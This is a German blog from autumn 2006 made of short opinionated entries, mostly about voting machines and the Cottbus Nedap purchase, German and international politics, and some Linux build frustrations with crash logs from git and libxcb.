*** glibc detected *** git-http-fetch: double free or corruption (fasttop): 0x08085860 ***
```
Und falls jetzt jemand denkt, ich hätte irgendwas ungezogenes mit git gemacht: ich rief "cg update" auf, im elinks tree.
[l] Only in America: Gefängniszellen in pink angemalt, mit blauen Teddybären fürs Decor
[l] Israel hat auch die französischen UNO-Soldaten im Libanon mit Scheinangriffen belästigt, und die haben sich echt bedroht gefühlt von den anfliegenden Kampfjets und haben zu Protokoll gegeben, sie seien nur zwei Sekunden von dem Abfeuern von Raketen auf die Jets entfernt gewesen. Die Franzosen sind sauer und haben den israelischen Botschafter einberufen und zur Schnecke gemacht.

Thu Nov 9 2006

[l] Jesus Camp hat zugemacht

Wed Nov 8 2006

[l] Oh prima. Die Amis sind abgelenkt, und schon zermalmen die Israelis im Gaza-Streifen eine Großfamilie und Hamas hebt den Waffenstillstand auf, der militärische Arm ruft gar zu Attentaten in Israel auf.
Für die Pro-Israel-Fanatiker (hallo, Jens), die jetzt faseln werden, daß Hamas ja eh Terroristen sind: das hat Hamas seit anderthalb Jahren nicht mehr gemacht. Interessanterweise ist dieses Mal sogar Olmert aufgefallen, daß das kein guter PR-Schachzug ist, nachts eine 18köpfige Familie in ihrem Schlaf zu ermorden, und er hat eine "Untersuchung" angekündigt. Oh ich bin mir sicher, daß da Gerechtigkeit herrschen wird!1!!

Tue Nov 7 2006

[l] Liebe Zielgruppe, wir haben es geschafft. Die Wahlmaschinen-Petition hat jetzt so viele Stimmen, daß sie eine Ersatzpetition eingerichtet haben.
Bei dieser Petition kann aus technischen Gründen Ihre Mitzeichnung nicht mehr sichtbar gemacht und gezählt werden. Bitte benutzen Sie zur Unterstützung die sachgleiche Ersatzpetition, die wir hierfür extra eingestellt haben. Wir bitten um Ihr Verständnis.
Hier ist die Ersatzpetition. Muhahaha, das finde ich ja einen großen Erfolg. Über 25000 Mitzeichner haben wir unter der alten Petition. Die 50000 können wir immer noch schaffen.

Mon Nov 6 2006

[l] Gibt gerade zwei interessante Dokumentationen, Hacking for Democracy von dem Team um Bev Harris und Iraq for Sale von Robert Greenwald (der schon Outfoxed gemacht hat)

Sat Nov 4 2006

[l] Ich hatte ja vor ner Weile das X von x.org kompiliert und darüber gemeckert. Nun gibt es Updates, und so habe ich mir gedacht, ich spiel die mal besser ein. Und was sehe ich, es gibt eine neue libX11 Implementation. Sie basiert auf xcb. Wer diesen Horror noch nicht erblickt hat, der schätze sich glücklich, aber ich werde diese Blase der Glückseligkeit jetzt gnadenlos zum Platzen bringen.
Die Idee war natürlich mal wieder, "kleiner" und "schneller" zu sein, "improved threading support" (!?!?) und "extensibility". Also wenn jemand von extensibility redet, dann gehen bei mir ja schon die Alarmglocken an, denn das ist das X aus XML. Und hey, was soll ich euch sagen, es kommt von Freedesktop.org, den größten Flaschen des Universums, die Homepage ist ein furchtbares Wiki (!), und es ist noch viel schlimmer:
XCB is built atop an XML description of the core X protocol and the protocol of most of the extensions in common use today.
OH MEIN GOTT! Warum würde jemand so etwas furchtbares tun?
This allows much of the XCB code to be auto-generated […]
Ich weiß nicht, wie es euch geht, aber ich habe noch NIE "auto-generated" Code gesehen, der kleiner, schneller oder besser wartbar gewesen wäre als handgeschriebener Code. Wer sich das noch mal eben vor Augen führen will, der möge sich mal ein "configure" angucken. Im Gegenteil, autogenerierter Code ist üblicherweise um Faktoren bis Größenordnungen größer und langsamer als handgehackter Code. Die einzige Ausnahme, wo generierter Code gelegentlich schneller ist, ist yacc (von Hand schreibt man normalerweise Top-Down Parser, keine Bottom-Up Parser wie yacc sie generiert, eben weil die nicht verständlich sind am Ende. Bei gcc haben sie kürzlich den yacc-Parser rausgeschmissen und einen Parser von Hand gemacht, weil dieser generierte Code völlig unwartbar war).
Aber hey, Vorurteile wollen gepflegt werden. Und so habe ich mal configure und make gesagt.
```
[…]
make[2]: Entering directory `/tmp/build/libxcb-0.9.93/src'
for i in xproto.xml bigreq.xml composite.xml damage.xml dpms.xml glx.xml randr.xml record.xml render.xml res.xml screensaver.xml shape.xml shm.xml sync.xml xc_misc.xml xevie.xml xf86dri.xml xfixes.xml xinerama.xml xprint.xml xtest.xml xvmc.xml xv.xml ; do \
           rm -f $i ; \
           ln -s /usr/X11R7/share/xcb/$i $i ; \
        done
/usr/bin/xsltproc --stringparam mode source \
                    --stringparam base-path /usr/X11R7/share/xcb/ \
                    --stringparam extension-path /usr/X11R7/share/xcb/ \
                    -o xproto.c ./c-client.xsl xproto.xml
make[2]: *** [xproto.c] Segmentation fault
```
Ja, richtig gesehen. Der XML-basierte Buildprozeß kackt ab. Nicht irgendein Teil — der Teil, der den auto-generierten Code generiert. Das ist libxslt 1.1.18, gelinkt gegen libxml2 2.6.27, nicht irgendein obsoleter Kack, falls das jetzt jemand vermutet hat.
Keine weiteren Fragen, Euer Ehren.
[l] Die Bundeswehr hat in Afghanistan nicht nur Tote geschändet, sondern auch mit einem kleinen Jungen Scheinhinrichtung gespielt.
Konkret berichtet der Unteroffizier, ein Bundeswehrsoldat haben einen afghanischen Jungen zu sich gerufen, ihn in den Schwitzkasten genommen und ihm eine geladene Waffe an den Kopf gedrückt. So ließ er sich fotografieren. Vier bis fünf Soldaten hätten mit ihren Digitalkameras Bilder gemacht, berichtete der Unteroffizier. Zu den Vorfällen liegt WELT.de eine eidesstattliche Versicherung vor.
Die Bundeswehr sollte zugemacht werden, und ihr gesamter Etat sollte zur Hälfte in die Schuldentilgung und zur anderen Hälfte in die Bildung gehen. Nicht nur sind die überflüssig wie ein Kropf, sie sind aktiv schädlich. (Danke, skep)

Wed Nov 1 2006

[l] Das Finanzproblem der Bundeswehr ist hausgemacht. Es kommt daher, daß sie unbrauchbare Munition aus dem kalten Krieg weiter einlagert, anstatt sie zu vernichten, und daß sie auch geächtete Waffen wie Streubomben weiter einlagert, und veraltete Kampfjets, deren Ausmusterung längst beschlossen ist, für viel Geld weiter betriebs- und kampfbereit hält.

Tue Oct 31 2006

[l] Kracher des Tages: Einer der Aubis-Manager (Berliner Bankenskandal) hatte sich Verhandlungsunfähigkeit bescheinigen lassen — aber dann beim Berlin-Marathon mitgemacht. Sein Anwalt meint, der Arzt habe ihm die Teilnahme an dem Marathon "aus therapeuthischen Gründen empfohlen". Muhahaha!

Sat Oct 21 2006

[l] Wer verstehen will, wie unsere Kommunen mit ihren Finanzmauscheleien durchkommen, der muss sich mal über Kameralistik und Doppik informieren.
Doppik ist die doppelte Buchführung, wie sie selbstverständlich im kaufmännischen Bereich gefordert wird. Da hat man Haben und Soll, und wenn ich mit meinem Geld einen Computer kaufe (oder mein Tafelsilber verkaufe), ändert sich an der Bilanz nichts. Ich habe nur eine Form von Haben in eine andere überführt.
Kommunen rechnen aber in Deutschland nach der Kameralistik ab, einem mittelalterlichen System wie damals bei den Kämmerern und ihren Schatztruhen. Da betrachtet man stattdessen Einnahmen und Ausgaben. Wenn also eine Kommune ihre Straßenbahn unter Wert an einen Heuschrecken"investor" verkauft, dann kommen Einnahmen rein (denn Bargeld kommt rein), das sieht also in der Kameralistik wie positiver Cash-Flow, d.h. etwas grundsätzlich gutes aus. Gleichwertig mit z.B. Steuereinnahmen. Unter dem Strich hat die Kommune natürlich Verlust gemacht, aber das stellt sich in diesem Abrechnungssystem eben nicht so dar. Das hat mir der Andreas zwischen Tür und Angel erklärt vorhin, ich hoffe, er blogt das noch mal in ausführlich, und ich habe das halbwegs korrekt wiedergegeben hier. (Danke, Andreas)

Fri Oct 20 2006

[l] "Wir brauchen ein Bundesgesetz, das regelt, wie besonders schwierige Haushaltslagen verhindert werden können". "Dazu müssen wir eindeutige Verschuldungsgrenzen definieren und die Verletzung der Vorgaben mit Sanktionen ahnden." Das sagte die Parlamentarische Staatssekretärin im Bundesfinanzministerium, Barbara Hendricks.
Und das ist noch gar nicht der Gipfel der Idiotie, die Bayern toppen das mal wieder locker. Bayerns Finanzminister fordert für den Länderfinanzausgleich einen Stabilitätspakt, wie er schon auf EU-Ebene großartig funktioniert.
Aber wer dachte, die Berliner Politiker seien diesmal bloß Opfer und würden ansonsten die Klappe halten, der sieht sich getäuscht.
Ich sehe nicht ein, dass wir bei Pisa ganz hinten sind und 18 Prozent mehr Lehrer haben. Das geht nicht. Und interessant ist, dass unsere drei Universitäten mehr Zuschüsse bekommen als die zwei Münchner Unis, aber die haben die Exzellenzinitiative gewonnen.
Das sagt der Berliner Finanzsenator Sarrazin. Kann man das noch toppen? Klar!
Die Fraktionschefin der Berliner Grünen, Franziska Eichstädt-Bohlig sieht noch Einsparmöglichkeiten. Als Beispiele nannte sie der "Frankfurter Rundschau" die öffentliche Verwaltung, die Wohnungswirtschaft und eine Erhöhung der Gewerbesteuer.
Verwaltung sagen immer alle, und dann wird noch eine Behörde dazu gestellt, um den "Abbau" der anderen zu verwalten. Mit Wohnungswirtschaft kann sie nur meinen, die Wohnungsbaugesellschaften an Heuschrecken"investoren" zu verhökern, was ich im Übrigen auch schon in der Äußerung des Verfassungsgericht unerträglich fand, daß die das ernsthaft vorgeschlagen haben. Das wird hunderttausenden Armen echt die Lebensqualität senken. Und die Gewerbesteuer erhöhen? Muhahaha, in Berlin gibt es so gut wie gar keine Industrie, im Dot-Com-Boom haben alle möglichen New Economy Klitschen auf- und gleich wieder zugemacht. München hat mehr Einnahme durch Gewerbesteuer (1 Mrd) als Berlin (783 Mio), obwohl in Berlin viel mehr Menschen wohnen, und auch in München die ganze Industrie eher im Speckgürtel sitzt (genau wie in Brandenburg die meisten größeren Firmen um Berlin herum sitzen). Wieso denken Kommunen immer zuerst an die Gewerbesteuer? Weil sie nichtviele andere Knöpfe haben bei den Steuereinnahmen. Oh, und wo wir schon über Berlins Finanzmisere reden… schaut euch das mal selber an. Einnahmen für 2006: 17.078 Megaeuro, Ausgaben für 2006: 20.222 Megaeuro. Davon 12% oder 2475 Megaeuro nur Zinsausgaben. Das sieht schon schlimm aus? Berlin nimmt an Steuern überhaupt nur 8.234 Megaeuro ein, der Rest kommt vom Bund (5192 Megaeuro) und krasse 1338 Megaeuro "Verwaltungseinnahmen" (darunter stelle ich mir Knöllchen-Kollonnen vor…?). Tja, liebe Bürger, das sind so Details, die man eigentlich gar nicht wissen wollte.
Oh, ein Schmankerl doch. Die Herren Bundespolitiker, die solidere Haushalte fordern, haben selbst einen desolaten Haushalt, von dem das Finanzministerium folgendes sagt:
Er ist geprägt durch die schwierige Ausgangslage der öffentlichen Finanzen - rund 20 Prozent der Ausgaben des Bundes sind nicht durch nachhaltige Einnahmen gedeckt - und er setzt 2006 den Schwerpunkt auf die Unterstützung der anziehenden Konjunktur.
[l] Eine Erkenntnis zu den Wahlmaschinen, die vielleicht dem einen oder anderen noch nicht so klar ist: In der DDR (!) konnten die Bürger die Wahl nachzählen. Ja, das war mit Repressalien verbunden, Parteiausschluß und sonstigen Nachteilen, aber Bürger konnten es tun. 1989 gab es eine organisierte Bürgerbewegung, die das gemacht hat, und so der Regierung Wahlbetrug nachweisen konnte.
Wenn wir Wahlmaschinen einsetzen, haben wir weniger Transparenz als die DDR sie hatte.
Das muss man sich mal auf der Zunge zergehen lassen.
[l] David Wagner und Ed Felton beschreiben in der Wired, wie eine Wahlmaschine aussähe, der sie trauen würden, und das Ergebnis ist: zwei Maschinen. Die erste ein Touchscreen, wo man die Partei auswählt, und der druckt dann vor den Augen des Wählers auf einem regulären Wahlzettel das Kreuzchen an der richtigen Stelle und händigt dem Wähler den Zettel aus. Der Wähler guckt dann, ob das richtige Kreuz gemacht wurde, und tut den Wahlzettel in eine Urne. Am Abend werden die Wahlzettel dann optisch gescannt. Man kann die Zettel auch gleich beim Abgeben der Stimme scannen, natürlich.
So wäre die Nachvollziehbarkeit gewährleistet, die Transparenz, und man könnte eine Nachzählung durchführen. Natürlich muss man immer noch aufpassen, daß man keine Emissionen raus leakt, wie die Nedap-Maschinen das tun, wo man dann von der Straße aus sehen kann, was die Leute wählen. Und sie sagen, entnehmbare Flashspeicher müssen auch weg. Der Nachteil eines solchen Setups ist der selbe, der auch jetzt schon Nedap beißt: das ist keinesfalls billiger als eine Papierwahl.

Thu Oct 19 2006

[l] Die BBC hat eine absolut grauenvolle Umfrage gemacht, die uns mal wieder zeigt, wie dünn die Zivilisationsdecke über dem schwelenden Mittelalter-Eiterpickel wirklich ist. Sie haben Leute gefragt, ob Regierungen foltern dürfen sollten, um damit Unschuldige zu retten. Sie haben über 27.000 Menschen in 25 Länden gefragt, und in Europa sind zwischen 20 und 30% der Menschen zumindest unter Einschränkungen für Folter. Ich finde das zutiefst schockierend, ich hatte Europa für weiter entwickelt gehalten. Sehr gruselig.
Und wenn es eine Botschaft gibt, die man aus dieser Umfrage mitnehmen muss, dann folgendes:
A majority of Jewish respondents in Israel, 53%, favour allowing governments to use some degree of torture to obtain information from those in custody, while 39% want clear rules against it.
But Muslims in Israel, who represent 16% of the total number polled, are overwhelmingly against any use of torture.
ACH. Der Islam, die Religion der menschenverachtenden Massenmörder, ja? Das höchste Anti-Folter-Niveau hat übrigens Italien. In den USA und in China finden prozentual ungefähr gleich viele Menschen Folter vertretbar.
[l] Ich habe e-Government ja immer für einen zahnlosen Papiertiger gehalten, der als Bettvorleger landet, aber diese Meinung hat sich heute komplett umgekehrt. Cottbus hat nämlich eine e-Government Webpräsenz, und wenn man da auf Politik klickt, und dann auf "Niederschriften", und dann als Sitzung die 30. Tagung der Stadtverordnetenversammlung auswählt, dann gibt es da einen Posten "II-025/06", "Erwerb von 74 elektronischen Wahlgeräten".
Dort kann man den Verwaltungsvorgang einsehen, der zum Kauf der Wahlmaschinen geführt hat. Erste Überraschung: der gesamte Vorgang ist von Mitte September. 2006. Inhaltliche Argumente pro/contra Wahlmaschinen gibt es keine. Der Kauf wird damit begründet, daß Anmietung teurer wäre.
Offenbar hat die Stadt Köln (die in ähnlicher Funktion schon mehrfach unangenehm aufgefallen ist) ursprünglich Cottbus Wahlmaschinen geliehen, damit sie Erfahrungen sammeln konnten. Und hey, klar, wenn man die geborgt kriegt, fällt einem der Anschaffungspreis nicht so auf.
Als Kontext: Cottbus ist in einer furchtbaren Finanzmisere. Die machen da eine Schule nach der anderen zu, in den Stadtverordnetenversammlungen werden ständig Grundstücke und Beteiligungen verhökert, der Haushalt für 2006 hat knapp doppelt so viel Ausgaben wie Einnahmen — ein Desaster. Diese Stadt ist am Rande des finanziellen Kollaps, und sie haben kürzlich in einem Bürgerbegehren ihre Oberbürgermeisterin verloren. Das ist da offenbar eine Station vor russischen Zuständen.
Und in so einer desolaten Finanzlage geben die Geld für Wahlmaschinen aus. Ein echter Brüller: Anlage 2, eine Grafik, mit der sie überzeugt wurden, daß Kaufen billiger ist als Mieten. Und die stehen offenbar so mit dem Rücken zur Wand, daß die nicht gefragt haben, ob es vielleicht besser wäre, das mit den Wahlmaschinen ganz sein zu lassen. In der Grafik deutet sich schon an, wie viel Geld die da ausgeben für Wahlmaschinen: rund 270.000 Euro. Für 74 Wahlmaschinen. Für 74 gebrauchte Wahlmaschinen. Und so beschränken sich die finanziellen Überlegungen auch darauf, wann man kaufen soll (Anlage 1), nicht ob.
Woher weiß ich denn, daß die Geräte gebraucht gekauft werden? Und wieso wäre später kaufen teurer gewesen? Überhaupt, stehen da Preise bei? Besser noch, da liegt das Angebot von Nedap/HSG bei (Anlage 3). Da habe ich ja nicht schlecht gestaunt, denn in dem Angebot steht, daß die Systemkosten 214.600 Euro sind, und daß das der Discount-Preis ist, weil die Geräte gebraucht sind. Der Neupreis liegt bei 4100 Euro pro Gerät, und das versteht sich zuzüglich Mehrwertsteuer. Oh, und bei so einem großzügigen Preis, da läßt sich HSG nicht lumpen, und schickt die Geräte unfrei raus, d.h. Transportkosten kommen noch dazu.
Was sind die Highlights des Angebots?
1. 74 Wahlgeräte Typ ESD1 (gebraucht)
2. 3 Stück Programmier- und Auslesegeräte
3. Kaufpreis reduziert sich um 10.800 Euro, wenn Cottbus noch eine Wahl abwartet vor dem Kauf (dann rechnet HSG großzügigerweise 40% der Mietgebühr an)
4. Pro Gerät pro Wahl kommen noch mal Kosten für Gerätebeschriftung (13-16 Euro) dazu, und pro Jahr pro Gerät für einen Wartungsvertrag (für Softwareupdate) 5 Euro pro Stimmbezirk (== pro Gerät, oder?)
Das funktioniert so, daß Cottbus dann ein PDF zu Nedap emailt, das sie mit Nedap-Design-Software gemacht haben, und die drucken dann eine Schablone aus und verkaufen die Cottbus für 16 Euro das Stück zurück. Die paßt dann genau unter die Tasten. Ja, unter die Tasten. D.h. wenn es jemand in drei Jahren schafft, Smart Paper zu bauen, das wie Paper aussieht, aber den Druckkontakt mißt und per RFID ausstrahlt, ist das gesamte System kompromittiert. Von sicherer Lieferung des Papiers steht da nichts. Aber hey, dafür bräuchte man kriminelle Energie, das findet Nedap sicher völlig undenkbar.
Als ich das gesehen habe, habe ich mich natürlich spontan gefragt, wie das jemals billiger als eine Papierwahl sein kann. Und weil ich so neugierig bin, habe ich mal gegoogelt, was so Wahlzettel kosten. Ihr werdet lachen, das kann man sich im Internet klicken, und kommt auf 2 Cent pro Wahlzettel (und das halte ich sogar noch für vergleichsweise teuer eingekauft, aber sei's drum). Cottbus hat etwas über 100.000 Einwohner. Wir sind also bei rund 2000 Euro Druckkosten für Wahlzettel. Demgegenüber stellt sich die Frage, wie viel Wert so eine Nedap-Maschine pro Wahl verliert. Dazu gucken wir einfach in das Angebot. Neuwert: 4100 Euro, Wert für die Gebrauchtmaschinen nach sechs Wahlen: 214.600 Euro für 74 Maschinen oder 2900 Euro pro Maschine. Differenz: 1200 Euro für sechs Wahlen, d.h. 200 Euro pro Wahl. 200 Euro Wertverlust pro Wahl. D.h. alle 74 Maschinen zusammen verlieren pro Wahl 14.800 Euro an Wert. Dem stehen 2500 Euro Druck- und Verteilkosten für Wahlzettel gegenüber (ich runde das mal auf, damit man Reserve hat und ich glatte Zahlen habe).
Fassen wir zusammen: Cottbus hat sich einen Wertverlust von 14.800 Euro pro Wahl gegenüber Druckkosten für eine Papierwahl von 2500 Euro pro Wahl als Kostensenkung verkaufen lassen, die sich nach weniger als 20 Jahren amortisiert (das Angebot sagt, daß die Hardware 20 Jahre hält).
Nun hat mich schon interessiert, wie sie das schönrechnen in ihrem Haushalt. Auf der e-Government Site findet man irgendwann 2005 den Haushalt für 2006, und da gibt es zwei Seiten mit konkreten Zahlen, die Wahlen betreffen. Einmal diese tabellarische Übersicht, wo die Wahlen einen Punkt unter vielen ausmachen, und einmal diese Seite mit Details zu den Wahlein- und -ausgaben. Ich bin ehrlich gesagt damit überfordert, das richtig zu interpretieren. Wenn mir das einer erklären kann, bitte ich um Emails. Für mich sieht das so aus, als hätten die 2004 127.000 Euro für Laptop-Miete ausgegeben, und fast 52.000 Euro für Post- und Fernmeldegebühren. Aber das kann ich so nicht glauben. Ein guter neuer Firmenlaptop kostet 2000 Euro, d.h. für 127 Kiloeuro hätten die da 63 Neulaptops kaufen können. Wahrscheinlich hätten sie noch Rabatt gekriegt und 100 neu kaufen können für das Geld. WTF? Und 50 Kiloeuro für Fernmeldegebühren? Für eine Wahl?! Haben die da für die Anbindung der Wahllokale einen vergoldeten Satelliten ins All geschossen!? Machen da 50% der Bevölkerung Briefwahl!? Aber man sieht, daß die für Druck- und Vervielfältigungen um die 3000 Euro ausgegeben haben, da lag ich mit meiner Schätzung ja in der richtigen Größenordnung.
So, das ist im Moment Stand meiner Ermittlungen. Wenn das hier jemand von der Presse mitliest: jetzt wäre der richtige Moment, darüber eine Story zu drucken. Bitte auch gerne von euren Blogs verlinken. Unser Zeitfenster ist knapp.
Oh, kurzer Hinweis noch: wenn ihr 74 EPROMs mit drei Lesegeräten auslesen sollt, was schätzt ihr, wie lange das dauert? Ist das wirklich so viel schneller als das tabellieren der dezentral gezählten Papierstimmzettel?
Update: Es gibt die ersten Erklärungen. Für eine Wahl müssen an alle Bürger Wahlbenachrichtigungen verschickt werden, das erklärt bei 100.000 Bürgern (gehen wir mal von 60.000 Wahlberechtigten aus) zu normalen Postkonditionen (gehen wir mal davon aus, daß die Regierung da zu inkompetent ist, bessere Konditionen auszuhandeln) zumindest Portokosten von 27.000 Euro (1 Postkarte == 45 Cent). Bleiben immer noch 25.000 Euro unklar im Postbudget. Dann vermutet jemand, die 127.000 Euro seien nicht für Notebooks, sondern für Wahlmaschinen ausgegeben worden. Das liegt natürlich nahe, die Vermutung, aber ich glaube da aus mehreren Gründen nicht dran:
1. geben Politiker immer erst mal weniger aus, und überlassen den Bulk den Leuten in den nächsten Legislaturperioden
2. haben die ja Wahlmaschinen geliehen, und selbst das teuerste Modell von Nedap kostet pro Jahr nur einen Bruchteil.
Es kann natürlich sein, daß die da das Geld "zurück gelegt" haben, aber wieso würden sie dann mieten und nicht gleich kaufen? Dann müssten sie weniger zurück legen. Also so richtig klar finde ich das immer noch nicht.

Wed Oct 18 2006

[l] Israel probiert offenbar eine neue Geheimwaffe an den Palästinensern aus.
Doctors in Gaza have reported previously unseen injuries from Israeli weapons that cause severe burning and deep internal wounds often resulting in amputations or death.
The injuries were first seen in July, when the Israeli military launched a series of operations in Gaza following the capture of an Israeli soldier by Palestinian militants. […]
"Bodies arrived severely fragmented, melted and disfigured," said Jumaa Saqa'a, a doctor at Shifa hospital, the main casualty hospital in Gaza City. "We found internal burning of organs, while externally there were minute pieces of shrapnel. When we opened many of the injured people we found dusting on the internal organs."
Aber hey, das ist ja eine gerechte Sache. Ähnlich gerecht wie was die Amis mit ihren Indianern gemacht haben.

Tue Oct 17 2006

[l] Ach übrigens, in Cottbus steht die nächste größere Wahl mit Wahlmaschinen an. Wenn ihr dieses Blog hier lest, und findet, daß man den Ergebnissen der Wahlmaschinen nicht einfach so trauen sollte, dann könnt ihr die Wahl anfechten. Ja, ernsthaft. Ich würde das tun. Bei mir war die letzte Wahl noch mit Papier und Stift, ansonsten hätte ich das angefochten.
Noch besser wäre es, wenn ihr den Wahlleitern die Sachlage erklärt. Oder vielleicht liest ja hier ein Wahlleiter mit? Der Wahlleiter erteilt nämlich mit seiner Unterschrift den Wahlmaschinen weitgehende Absolution. Wenn der Wahlleiter sich weigert, am Ende zu unterschreiben, daß seiner Meinung nach alle Stimmen ordentlich gezählt wurden, haben die da ein Problem.
Ich werde mal rausfinden, was man tun muss, um eine Wahl anzufechten. Aber ich bin mir ziemlich sicher, daß wir jetzt unser Zeitfenster haben, um Wahlmaschinen zu verhindern. Das ist jetzt schon richtig teuer für die dank der Nachprüfung der ganzen Automaten. Jetzt muss es auch noch unbequem und unangenehm werden. Wenn ihr also in der Woche Zeit habt, dann macht euch einen Spickzettel mit den Fakten, und erklärt das bei der Wahl dem Wahlleiter. Und nicht daß mir einer von euch gar nicht wählt, weil er den Wahlmaschinen nicht traut! Die meisten Hacker sind eher linksliberal, das wäre tragisch, wenn deshalb die Nazis Sitze abgreifen können.
Bei uns liefen nach der Wahl so Journalisten rum, die Interviews gemacht haben. Die wollten eigentlich wissen, ob wir uns von der Wahl eine Änderung versprechen, und so. Wenn bei euch ein Journalist ist, erzählt ihm von den Bedenken bezüglich der Wahlmaschinen.

Wed Oct 11 2006

[l] Der Stand unseres Rechtsstaats illustriert sich prima an diesem Artikel:
Die niedersächsischen Sicherheitsbehörden sind einem mutmaßlichen El-Kaida-Unterstützer bei Osnabrück mit Hilfe vorbeugender Telefonüberwachung auf die Spur gekommen.
Mutmaßlich? Sie haben ihn "vorbeugend" abgehört und haben nicht mal genug, um ihn einzusperren, und das soll jetzt der Erfolg sein, mit dem dieser Scheiß rückblickend gerechtfertig wird? Unglaublich. Na was haben sie denn überhaupt für Schritte eingeleitet jetzt?
Die Polizei habe angesichts der präventiven Telefonüberwachung Hinweise bekommen, so dass Landeskriminalamt und Verfassungsschutz eingeschaltet worden seien.
Das ist ein Witz, oder? Die kann man auch ohne Überwachung "einschalten". Na was soll er denn überhaupt gemacht haben?
Am Dienstagmorgen war […] der mutmaßliche El-Kaida-Unterstützer wegen der weltweiten Verbreitung von Terrorbotschaften Osama bin Ladens per Internet verhaftet worden.
WTF? Ist das Verbreiten von Botschaften im Internet jetzt verboten oder wie? Nach welchem Paragraphen denn? Schmähkritik? Volksverhetzung?
Aber wartet, wird noch toller. Sie versuchen noch, das Verfassungsgericht zu beschmutzen:
[…] die Erkenntnisse […] seien im Jahr 2005 noch mit Hilfe der präventiven Telefonüberwachung gewonnen worden, die jedoch kurze Zeit später vom Bundesverfassungsgericht verboten wurde.
ZU RECHT!
Schünemann lässt nun von einem Göttinger Staatsrechtler die Möglichkeiten ausloten, ob die präventive Telefonüberwachung doch noch im niedersächsischen Polizeigesetz verankert werden kann.
Und solche Verfassungsfeinde machen bei uns Politik. Unglaublich.

Thu Oct 5 2006

[l] Vielleicht ist dem einen oder anderen aufgefallen, wie viel heute in der Presse zu den gehackten Wahlmaschinen stand. Fast gar nichts. Slashdot berichtet, die Zeit berichtet, die Wiener Zeitung berichtet, der Tagesspiegel berichtet. AP? DPA? AFP? Reuters? Fehlanzeige. Ja, lest das nochmal. Die DPA, die Deutsche Presseagentur, berichtet nicht darüber, daß die Wahlmaschinen, auf denen die Wahlen und damit die Demokratie unseres Staates beruhen, vollständig zerhackt wurden. WTF!?
Wer berichtet noch nicht? Der Spiegel. Und der Focus. Die beiden streiten sich ja immer, wer besser ist. Beide sind offensichtlich völlig unakzeptabel. Über den Wahlbetrug der Nazis berichtet man häufig, ausführlich und gerne beim Spiegel, aber unser heutiger Faschismus ist tabu? ARD, ZDF? Schweigen im Walde. Zum Kotzen.
Aber man kann das ja auch positiv sehen. Jetzt wissen wir, wer uns im Zweifelsfall informiert und wer nicht. Der Tagesspiegel und die Zeit haben gerade massiv Punkte gemacht bei mir.

Tue Oct 3 2006

[l] Ich könnte mich ja nur wegpacken, wie den Amis gerade dieser Pädophile Republikaner explodiert. Erstens ist dieses Segment mit ihm bei America's Most Wanted aufgetaucht, wo er "If I were one of these sickos, I'd be nervous" sagt.
Und dann haben die Republikaner Erklärungsnot, wieso sie nichts gemacht haben, seit sie spätestens 2005 von den Emails wußten. Inzwischen ist bekannt, daß schon 2001 Indizien vorlagen. Die Republikaner haben jetzt die absolut großartigste Ausrede der Welt: wenn sie dagegen vorgegangen wären, dann hätte das wie Gay Bashing ausgesehen (das war auch noch ein männlicher Teenie, dem der Pädophile da nachstellte). Gay Bashing! Und NICHTS liegt den Republikanern (die gerade Gay Marriage verboten haben) ferner als das!1!!

Sun Oct 1 2006

[l] Die Goldindustrie hat den größten Fluß der Mongolei kaputt gemacht; da haben früher in der Wüste die Menschen von überlebt, aber jetzt kommt da kaum noch Wasser an.
[l] Shadowrun kommt, heute: Wohnungsbaugesellschaften und ihre Rent-a-cops. Besonders lustig:
Die GSW hat im Übrigen schon vor Jahren die Erfahrung gemacht, dass nicht alle Maßnahmen zur Erhöhung der Sicherheit bei den Mietern gut ankommen. Ein Pilotprojekt, mit dem in der Wasserstadt Spandau Eltern über den Mieterkanal des Kabelfernsehens einen Spielplatz überwachen konnten, musste das Unternehmen abbrechen: Die Mieter kamen sich beobachtet vor, die Kinder suchten andere Spielplätze auf, und die Kamera wurde immer wieder zerstört.

Tue Sep 26 2006

[l] Das gute bei Apple ist, daß die so fies, widerlich, geldgeil und unerträglich sind, daß sie sich immer wieder selbst ins Bein schießen. Ich erinnere mich noch gut an das Firewire-Debakel, was sich Apple kaputt gemacht hat, indem sie Lizenzgebühren dafür haben wollten. Daher sind Firewire-Platten immer etwas teurer als USB-Platten, und die Technologie ist inzwischen so tot, daß selbst Apple in den neuesten Geräten kein Firewire mehr verbaut. Herzlichen Glückwunsch, Apple. Jetzt haben sie offenbar "podcast" zu trademarken versucht, sind gescheitert, aber mahnen trotzdem die Leute ab, weil, hey, vielleicht hat jemand nicht mitgekriegt, daß Apple gar kein Trademark darauf hat!1!! Die haben echt sowas von klar und deutlich den Untergang verdient, das hat es so in der Computergeschichte noch nie gegeben. IBM und Microsoft sind geradezu Sympathieträger im Vergleich.

Mon Sep 25 2006

[l] Wo wir gerade bei beknackten Gesetzen sind: Über dieses Internet-Archivierungsgebot der Nationalbibliothek habe ich mich noch viel zu wenig lustig gemacht. Wobei das durchaus auch zu positiven Ergebnissen führen könnte, wenn die den Spiegel archivieren, und man dann auch ohne kostenpflichtiges Spiegel-Archiv auf die Inhalte zugrifen kann.

Sun Sep 24 2006

[l] Guckt euch "Das Parfum" an. Dieser Film ist geradezu schockierend gut gemacht. Ich glaube nicht, daß das jemand anderes hätte verfilmen können. Tom Tykwer ist Gott.

Sat Sep 23 2006

[l] Wie war dieser Mark Twain Spruch? Nur Deppen rauben ein Bank aus, richtige Kriminelle _gründen_ eine Bank? Der britische Zoll hat in einem fetten Mehrwertsteuerbetrug so viele Konten bei der selben Bank gefunden, daß sie die Bank jetzt zugemacht haben.
In a joint Anglo-Dutch operation that included raids in London, the Netherlands and south Wales, First Curaçao International Bank (FCIB) was shut down after it was found that every individual arrested and charged with so-called carousel fraud in the last two years had an account there.
Update: war nicht Mark Twain, sondern Brecht.

Fri Sep 22 2006

[l] Oberster Gerichtshof in Indien kippt das Coca Cola Verbot, das wegen der krass erhöhten Pestizidwerte von einigen Ländern erlassen worden war. Da haben die Pferdeköpfe der Amis wohl gewirkt. Achtet mal darauf, wie in dem Artikel Propaganda gemacht wird. Sie beschreiben lang und breit, wie Coca Cola und PepsiCo "Zweifel" an dem Pestizidgutachten geäußert hätten, und das Gesundheitsministerium offenbar auch, aber sie haben nicht mal ein Gegengutachten am Start!
[l] Falls sich jemand gewundert hat, wieso Pakistan eigentlich beim War on Terror mitgemacht hat… gute Frage. Die hatten ja wahrlich genug Ärger innenpolitisch. Stellt sich raus, daß die Amis ihnen mit Bombardierung gedroht haben, falls sie nicht mitmachen.
